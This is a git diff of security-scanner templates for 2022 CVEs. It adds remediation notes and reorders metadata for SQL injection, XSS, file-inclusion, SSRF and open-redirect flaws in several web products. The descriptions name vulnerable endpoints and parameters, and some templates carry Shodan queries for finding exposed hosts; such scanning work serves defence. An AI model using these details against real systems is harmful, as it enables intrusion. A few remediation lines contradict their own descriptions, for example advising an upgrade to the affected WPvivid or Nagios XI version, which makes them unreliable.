a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microfinance Management System 1.0 is susceptible to SQL Injection. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip @@ -18,11 +20,11 @@ info: cve-id: CVE-2022-27927 cwe-id: CWE-89 epss-score: 0.01576 - cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.85682 + cpe: cpe:2.3:a:microfinance_management_system_project:microfinance_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: microfinance_management_system_project product: microfinance_management_system tags: microfinance,edb,cve,cve2022,sqli diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 5af476d840..301c987633 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php. + remediation: | + Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984). reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-27984 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-27984 cwe-id: CWE-89 epss-score: 0.0148 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.85145 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,sqli,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index 0bde70b02b..f274d866c0 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. + remediation: | + Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-27985 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-27985 cwe-id: CWE-89 epss-score: 0.01534 - cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* epss-percentile: 0.85463 + cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cuppacms product: cuppacms tags: cve,cve2022,sqli,cuppa,authenticated diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index bb7799253e..d9126347b0 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-28022 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system tags: cve,cve2022,sqli,purchase-order-management-system diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index addfa5be19..7da35ae1ea 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html @@ -16,11 +18,11 @@ info: cve-id: CVE-2022-28023 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system tags: cve,cve2022,sqli,purchase-order,poms diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 99bf9626a7..c04fcdd3a1 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -6,21 +6,21 @@ info: severity: critical description: | AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php + remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/263 - https://nvd.nist.gov/vuln/detail/CVE-2022-28032 - remediation: Fixed in version Atom CMS v2.1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-28032 cwe-id: CWE-89 epss-score: 0.01144 - cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* epss-percentile: 0.82961 + cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: thedigitalcraft product: atomcms tags: cve,cve2022,sqli,atom,cms diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 9311580ee5..858d89bd3d 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -6,6 +6,8 @@ info: severity: high description: | College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f @@ -18,11 +20,11 @@ info: cve-id: CVE-2022-28079 cwe-id: CWE-89 epss-score: 0.82769 - cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.97977 + cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: college_management_system_project product: college_management_system tags: cve,cve2022,sqli,cms,collegemanagement diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 9fe8912220..83972dfea0 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + remediation: | + To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: - https://www.exploit-db.com/exploits/50934 - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip @@ -18,8 +20,8 @@ info: cve-id: CVE-2022-28080 cwe-id: CWE-89 epss-score: 0.01427 - cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.84873 + cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: event_management_system_project diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index bb15c9dbbf..beb56904e7 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution. + remediation: | + Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability. reference: - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5 @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-28117 cwe-id: CWE-918 epss-score: 0.01914 - cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* epss-percentile: 0.87092 + cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:* metadata: - max-request: 4 verified: true + max-request: 4 vendor: naviwebs product: navigate_cms tags: authenticated,packetstorm,cve,cve2022,ssrf,navigate,cms,lfi,intrusive diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 67dae3827b..ce05439af3 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -7,29 +7,29 @@ info: description: | Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an unauthenticated XML entity injection attack that can lead to remote code execution. + remediation: | + Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus + is configured with a dedicated service account with restricted privileges. reference: - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html - https://www.horizon3.ai/red-team-blog-cve-2022-28219/ - https://manageengine.com - https://nvd.nist.gov/vuln/detail/CVE-2022-28219 - http://cewolf.sourceforge.net/new/index.html - remediation: | - Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus - is configured with a dedicated service account with restricted privileges. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-28219 cwe-id: CWE-611 epss-score: 0.97341 - cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* epss-percentile: 0.99825 + cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" verified: true + max-request: 1 vendor: zohocorp product: manageengine_adaudit_plus + shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus" tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth http: diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index f856e68bb9..e791036057 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479 - https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-28290 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* epss-percentile: 0.4034 + cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: welaunch product: wordpress_country_selector + framework: wordpress tags: wordpress-country-selector,wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss http: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index d053d9b067..6b43c14b9a 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + remediation: | + Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-rpvc-qgrm-r54f @@ -17,8 +19,8 @@ info: cve-id: CVE-2022-28363 cwe-id: CWE-79 epss-score: 0.00237 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* epss-percentile: 0.61084 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index f12634d173..066d5981a2 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. reference: - https://www.reprisesoftware.com/products/software-license-management.php - https://github.com/advisories/GHSA-4g2v-6x25-vr7p @@ -18,8 +20,8 @@ info: cve-id: CVE-2022-28365 cwe-id: CWE-425 epss-score: 0.00333 - cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* epss-percentile: 0.67494 + cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: reprisesoftware diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 352d3cd8a6..4addfe0c88 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -5,25 +5,25 @@ info: author: tehtbl severity: medium description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server. + remediation: Upgrade to version 0.9.76 or later. reference: - https://seclists.org/fulldisclosure/2022/Oct/0 - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5 - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2022-2863 - remediation: Upgrade to version 0.9.76 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2022-2863 cwe-id: CWE-22 epss-score: 0.63285 - cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* epss-percentile: 0.97403 + cpe: cpe:2.3:a:wpvivid:migration\,_backup\,_staging:*:*:*:*:*:wordpress:*:* metadata: max-request: 3 - framework: wordpress vendor: wpvivid product: migration\,_backup\,_staging + framework: wordpress tags: wp,wpscan,seclists,packetstorm,authenticated,cve,cve2022,lfi,wordpress,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index a7c036bc4b..9ab49b3e68 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability. reference: - https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/ - https://www.cve.org/CVERecord?id=CVE-2022-28923 @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-28923 cwe-id: CWE-601 epss-score: 0.00696 - cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* epss-percentile: 0.7774 + cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: 'Server: caddy' + max-request: 1 vendor: caddyserver product: caddy + shodan-query: 'Server: caddy' tags: cve,cve2022,redirect,caddy,webserver http: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index cf5e704039..0de3fec4bc 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest firmware update provided by D-Link to fix the access control issue. reference: - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md - https://www.dlink.com/en/security-bulletin/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-28955 cwe-id: CWE-287 epss-score: 0.02376 - cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* epss-percentile: 0.88455 + cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:* metadata: - max-request: 2 - shodan-query: http.html:"DIR-816L" verified: true + max-request: 2 vendor: dlink product: dir-816l_firmware + shodan-query: http.html:"DIR-816L" tags: cve,cve2022,dlink,exposure http: diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b884041188..b27eb7de21 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-29004 cwe-id: CWE-79 epss-score: 0.00174 - cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.53866 + cpe: cpe:2.3:a:e-diary_management_system_project:e-diary_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: e-diary_management_system_project product: e-diary_management_system tags: cve,cve2022,xss,authenticated,edms diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 19f1cf86da..aef3eaf8aa 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-29005 cwe-id: CWE-79 epss-score: 0.00115 - cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:* epss-percentile: 0.44553 + cpe: cpe:2.3:a:online_birth_certificate_system_project:online_birth_certificate_system:1.2:*:*:*:*:*:*:* metadata: - max-request: 3 verified: true + max-request: 3 vendor: online_birth_certificate_system_project product: online_birth_certificate_system tags: cve,cve2022,xss,obcs,authenticated diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 967d0bb598..553ff2e73c 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0. reference: - https://www.exploit-db.com/exploits/50370 - https://phpgurukul.com/directory-management-system-using-php-and-mysql/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-29006 cwe-id: CWE-89 epss-score: 0.20033 - cpe: cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.95679 + cpe: cpe:2.3:a:directory_management_system_project:directory_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: directory_management_system_project product: directory_management_system tags: cve,cve2022,sqli,auth-bypass,edb diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index da79f1bf59..e2d8b54aec 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50365 - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-29007 cwe-id: CWE-89 epss-score: 0.20033 - cpe: cpe:2.3:a:dairy_farm_shop_management_system_project:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.95679 + cpe: cpe:2.3:a:dairy_farm_shop_management_system_project:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: dairy_farm_shop_management_system_project product: dairy_farm_shop_management_system tags: cve,cve2022,sqli,auth-bypass,edb diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 57ccb9de04..7316bc3a16 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/50355 - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/ @@ -17,11 +19,11 @@ info: cve-id: CVE-2022-29009 cwe-id: CWE-89 epss-score: 0.20033 - cpe: cpe:2.3:a:cyber_cafe_management_system_project:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* epss-percentile: 0.95679 + cpe: cpe:2.3:a:cyber_cafe_management_system_project:cyber_cafe_management_system:1.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: cyber_cafe_management_system_project product: cyber_cafe_management_system tags: cve2022,sqli,auth-bypass,edb,cve diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 6d550743b3..93abca2c06 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: high description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + remediation: | + Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. reference: - https://www.exploit-db.com/exploits/50864 - https://nvd.nist.gov/vuln/detail/CVE-2022-29014 @@ -15,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2022-29014 epss-score: 0.79768 - cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* epss-percentile: 0.97868 + cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* metadata: max-request: 1 vendor: razer diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 308002ddb2..d1bc57b373 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation. + remediation: | + Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability. reference: - https://eslam.io/posts/ejs-server-side-template-injection-rce/ - https://github.com/miko550/CVE-2022-29078 @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-29078 cwe-id: CWE-94 epss-score: 0.02789 - cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* epss-percentile: 0.89291 + cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: ejs product: ejs + framework: node.js tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive http: diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 8081d4e08d..b3b04a37c8 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -6,27 +6,27 @@ info: severity: high description: | HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5. reference: - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393 - https://github.com/hashicorp/consul/pull/12685 - https://developer.hashicorp.com/consul/docs/discovery/checks - https://nvd.nist.gov/vuln/detail/CVE-2022-29153 - https://discuss.hashicorp.com - remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2022-29153 cwe-id: CWE-918 epss-score: 0.01648 - cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* epss-percentile: 0.85995 + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: - max-request: 2 - shodan-query: title:"Consul by HashiCorp" verified: true + max-request: 2 vendor: hashicorp product: consul + shodan-query: title:"Consul by HashiCorp" tags: cve,cve2022,consul,hashicorp,ssrf,intrusive http: diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index f9cebcb2f4..85285b775c 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability. reference: - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272 - https://github.com/4LPH4-NL/CVEs @@ -18,8 +20,8 @@ info: cve-id: CVE-2022-29272 cwe-id: CWE-601 epss-score: 0.00188 - cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* epss-percentile: 0.55474 + cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: nagios diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index ca570137dd..e3c1bae639 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. + remediation: | + Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in 